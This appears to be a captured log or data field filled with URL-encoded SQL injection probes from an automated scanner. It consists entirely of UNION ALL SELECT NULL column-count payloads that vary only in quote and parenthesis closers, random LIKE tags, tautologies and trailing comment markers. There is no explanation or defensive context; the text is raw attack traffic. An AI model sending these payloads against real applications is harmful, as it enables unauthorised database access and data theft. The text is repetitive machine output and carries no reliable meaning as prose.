1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22MYYB%22%20LIKE%20%22MYYB 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22yNHJ%22%20LIKE%20%22yNHJ 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22RalB%22%20LIKE%20%22RalB 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22biPm%22%20LIKE%20%22biPm 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22lmSn%22%20LIKE%20%22lmSn 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22SrwQ%22%20LIKE%20%22SrwQ 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22iyGJ%22%20LIKE%20%22iyGJ 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22pEeX%22%20LIKE%20%22pEeX 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22fCLN%22%20LIKE%20%22fCLN 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22ZJaF%22%20LIKE%20%22ZJaF 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22eVpX%22%20LIKE%20%22eVpX 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22ssgJ%22%20LIKE%20%22ssgJ 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22fKnY%22%20LIKE%20%22fKnY 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22EERW%22%20LIKE%20%22EERW 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22MGhy%22%20LIKE%20%22MGhy 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22bLuh%22%20LIKE%20%22bLuh 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22hrbu%22%20LIKE%20%22hrbu 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22hhTQ%22%20LIKE%20%22hhTQ 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22ACpe%22%20LIKE%20%22ACpe 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22MiaQ%22%20LIKE%20%22MiaQ 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22ctHZ%22%20LIKE%20%22ctHZ 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22QJTw%22%20LIKE%20%22QJTw 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22aNVf%22%20LIKE%20%22aNVf 1234.5%29%20WHERE%208461%3D8461%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%207860%3D7860%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%205080%3D5080%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%208833%3D8833%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%207597%3D7597%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%209901%3D9901%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%204868%3D4868%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%208379%3D8379%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%209551%3D9551%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%202446%3D2446%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%201345%3D1345%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%202674%3D2674%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%209014%3D9014%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%208810%3D8810%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%206027%3D6027%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%207942%3D7942%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%203316%3D3316%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%207224%3D7224%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%206121%3D6121%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20WHERE%202945%3D2945%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%207943%3D7943%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20WHERE%207390%3D7390%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 